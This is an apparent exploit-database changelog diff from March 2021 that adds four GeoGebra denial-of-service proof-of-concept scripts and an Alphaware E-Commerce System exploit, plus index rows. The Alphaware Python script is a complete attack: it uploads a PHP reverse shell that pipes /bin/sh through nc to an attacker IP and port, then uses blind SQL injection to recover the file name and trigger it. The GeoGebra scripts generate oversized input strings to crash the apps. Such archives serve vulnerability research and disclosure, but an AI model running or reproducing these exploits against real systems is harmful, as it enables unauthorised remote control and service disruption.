DB: 2021-03-17

6 changes to exploits/shellcodes

GeoGebra Graphing Calculato‪r‬ 6.0.631.0 - Denial Of Service (PoC)
GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC)
GeoGebra CAS Calculato‪r‬ 6.0.631.0 - Denial of Service (PoC)
GeoGebra 3D Calculator 5.0.511.0 - Denial of Service (PoC)

Alphaware E-Commerce System 1.0 - Unauthenicated Remote Code Execution (File Upload + SQL injection)

exploits/android/local/49656.py

@@ -0,0 +1,28 @@
+# Exploit Title: GeoGebra 3D Calculator 5.0.511.0 - Denial of Service (PoC)
+# Date: 2021-03-15
+# Author: Brian Rodríguez
+# Software Site: https://www.geogebra.org/download
+# Download Link: https://play.google.com/store/apps/details?id=org.geogebra.android.g3d&utm_source=Download+page&utm_medium=Website&utm_campaign=3D+Calculator+for+Android
+# Version: 5.0.511.0
+# Category: DoS (Android)
+
+##### Vulnerability #####
+
+Graficador GeoGebra 3D is vulnerable to a DoS condition when a long list of characters is being used in field "Entrada..." text box.
+
+Successful exploitation will causes application stop working.
+
+I have been able to test this exploit against Android 10.0.
+
+##### PoC #####
+
+#!/usr/bin/env python
+buffer = "\x41" * 8000
+
+try:
+    f = open("payload.txt","w")
+    f.write(buffer)
+    f.close()
+    print ("File created")
+except:
+    print ("File cannot be created")

exploits/multiple/webapps/49649.txt

@@ -5,6 +5,7 @@
 # Software Link: https://sourceforge.net/projects/openmaint/files/2.1/Core%20updates/openmaint-2.1-3.3.1/
 # Version: 2.1-3.3
 # Tested on: Linux
+# CVE: CVE-2021-27695
 
 Summary:
 

exploits/php/webapps/49652.py

@@ -0,0 +1,76 @@
+# Exploit Title: Alphaware E-Commerce System 1.0 - Unauthenicated Remote Code Execution (File Upload + SQL injection)
+# Date: 15-03-2021
+# Exploit Author: Christian Vierschilling
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/11676/alphaware-simple-e-commerce-system.html
+# Software Download: https://www.sourcecodester.com/download-code?nid=11676&title=Alphaware+-+Simple+E-Commerce+System+using+PHP+with+Source+Code
+# Version: 1.0
+# Tested on: PHP 7.4.14, Linux x64_x86
+
+# --- Description --- #
+
+# The web application allows for an unauthenticated file upload which can result in a Remote Code Execution.
+# We combine this issue with an sql injection to retrieve the randomised name of our uploaded php shell.
+
+# --- Proof of concept --- #
+
+#!/usr/bin/python3
+import random
+import sys
+import requests
+from requests_toolbelt.multipart.encoder import MultipartEncoder
+
+def file_upload(target_ip, attacker_ip, attacker_port):
+  random_number = str(random.randint(100000000,999999999))
+  file_name = "SHELL.php"
+  revshell_string = '<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f"); ?>'.format(attacker_ip, attacker_port)
+  m = MultipartEncoder(fields={'add': '', 'product_image': (file_name, revshell_string, 'application/x-php'),'product_code':random_number,'product_name':'R3v_5H3LL','product_price':'123','product_size':'99','brand':'N0_name','category':'Hackers','qty':'1'})
+  print("(+) Uploading php reverse shell file ..")
+  r1 = requests.post('http://{}/alphaware/admin/admin_football.php'.format(target_ip), data=m, headers={'Content-Type': m.content_type})
+  return random_number
+
+def trigger_shell_sqli(target_ip,product_id):
+  target_file_name = ''
+  url = 'http://{}/alphaware/function/admin_login.php'.format(target_ip)
+  print("(+) Now setting up our sqli for file name guessing ..")
+
+  # STEP 1: Get length of target column in database ..
+  for i in range(1, 200):
+    payload = {'enter':'','username':"' or {}=(select char_length(product_image) from product where product_id = {})#".format(i, product_id)}
+    r2 = requests.post(url, data=payload, allow_redirects=False)
+
+    # STEP 2: successful sqli will be indicated by a redirect.. setting up our blind based file name guessing. :-)
+    if str(r2.status_code) == '302':
+      print("(+) Initial sqli successful, got length of our target file name!")
+      print("(+) Now for the filename.. ", end = '')
+      for j in range(1, i+1):
+        for brutechar in range(32, 126):
+          payload = {'enter':'','username':"' or '{}'=(SELECT substring((SELECT product_image from product where product_id = {}),{},1))#".format(chr(brutechar),product_id,j)}
+          r3 = requests.post(url, data=payload, allow_redirects=False)
+          if str(r3.status_code) == '302':
+            target_file_name = target_file_name + chr(brutechar)
+            print(chr(brutechar), end = '')
+            sys.stdout.flush()
+            break
+
+  url = 'http://{}/alphaware/photo/{}.php'.format(target_ip,target_file_name.split('.')[0])
+  print("\r\n(+) Trying to trigger shell by requesting {} ..".format(url))
+  r4 = requests.get(url)
+
+def main():
+  if len(sys.argv) != 4:
+    print('(+) usage: %s <target ip> <attacker ip> <attacker port>' % sys.argv[0])
+    print('(+) eg: %s 10.0.0.1 10.13.37.10 4444' % sys.argv[0])
+    sys.exit(-1)
+
+  target_ip = sys.argv[1]
+  attacker_ip = sys.argv[2]
+  attacker_port = sys.argv[3]
+
+  product_id = file_upload(target_ip, attacker_ip, attacker_port)
+  trigger_shell_sqli(target_ip, product_id)
+
+  print("(+) done!")
+
+if __name__ == "__main__":
+  main()

exploits/windows/local/49653.py

@@ -0,0 +1,26 @@
+# Exploit Title: GeoGebra Graphing Calculato‪r‬ 6.0.631.0 - Denial Of Service (PoC)
+# Date: 2021-03-15
+# Exploit Author: Brian Rodriguez
+# Vendor Homepage: https://www.geogebra.org
+# Software Link: https://www.geogebra.org/download
+# Version: 6.0.631.0-offlinegraphing
+# Tested on: Windows 8.1 Pro
+
+# STEPS
+# Open the program Graficadora
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt in the field "Entrada..."
+# Crashed
+
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 8000
+
+try:
+    f = open("payload.txt","w")
+    f.write(buffer)
+    f.close()
+    print ("File created")
+except:
+    print ("File cannot be created")

exploits/windows/local/49654.py

@@ -0,0 +1,26 @@
+# Exploit Title: GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC)
+# Date: 2021-03-15
+# Exploit Author: Brian Rodriguez
+# Vendor Homepage: https://www.geogebra.org
+# Software Link: https://www.geogebra.org/download
+# Version: 5.0.631.0-d
+# Tested on: Windows 8.1 Pro
+
+#STEPS
+# Open the program GeoGebra
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content in the field "Entrada:"
+# Crashed
+
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 800000
+
+try:
+    f = open("payload.txt","w")
+    f.write(buffer)
+    f.close()
+    print ("File created")
+except:
+    print ("File cannot be created")

exploits/windows/local/49655.py

@@ -0,0 +1,26 @@
+# Exploit Title: GeoGebra CAS Calculato‪r‬ 6.0.631.0 - Denial of Service (PoC)
+# Date: 2021-03-15
+# Exploit Author: Brian Rodriguez
+# Vendor Homepage: https://www.geogebra.org
+# Software Link: https://www.geogebra.org/download
+# Version: 6.0.631.0-offlinecas
+# Tested on: Windows 8.1 Pro
+
+# STEPS
+# Open the program Calculadora CAS
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt in the field "Entrada..."
+# Crashed
+
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 8000
+
+try:
+    f = open("payload.txt","w")
+    f.write(buffer)
+    f.close()
+    print ("File created")
+except:
+    print ("File cannot be created")

files_exploits.csv

@@ -11286,6 +11286,10 @@ id,file,description,date,author,type,platform,port
 49646,exploits/windows/local/49646.txt,"Realtek Wireless LAN Utility 700.1631 - 'Realtek11nSU' Unquoted Service Path",2021-03-15,"Luis Martínez",local,windows,
 49647,exploits/windows/local/49647.txt,"eBeam education suite 2.5.0.9 - 'eBeam Device Service' Unquoted Service Path",2021-03-15,"Luis Martínez",local,windows,
 49648,exploits/windows/local/49648.txt,"Interactive Suite 3.6 - 'eBeam Stylus Driver' Unquoted Service Path",2021-03-15,"Luis Martínez",local,windows,
+49653,exploits/windows/local/49653.py,"GeoGebra Graphing Calculato‪r‬ 6.0.631.0 - Denial Of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows,
+49654,exploits/windows/local/49654.py,"GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows,
+49655,exploits/windows/local/49655.py,"GeoGebra CAS Calculato‪r‬ 6.0.631.0 - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows,
+49656,exploits/android/local/49656.py,"GeoGebra 3D Calculator 5.0.511.0 - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,android,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -43837,3 +43841,4 @@ id,file,description,date,author,type,platform,port
 49649,exploits/multiple/webapps/49649.txt,"openMAINT openMAINT 2.1-3.3-b - 'Multiple' Persistent Cross-Site Scripting",2021-03-15,"Hosein Vita",webapps,multiple,
 49650,exploits/multiple/webapps/49650.py,"Sonlogger 4.2.3.3 - SuperAdmin Account Creation / Information Disclosure",2021-03-15,"Berkan Er",webapps,multiple,
 49651,exploits/multiple/webapps/49651.rb,"SonLogger 4.2.3.3 - Unauthenticated Arbitrary File Upload (Metasploit)",2021-03-15,"Berkan Er",webapps,multiple,
+49652,exploits/php/webapps/49652.py,"Alphaware E-Commerce System 1.0 - Unauthenicated Remote Code Execution (File Upload + SQL injection)",2021-03-16,"Christian Vierschilling",webapps,php,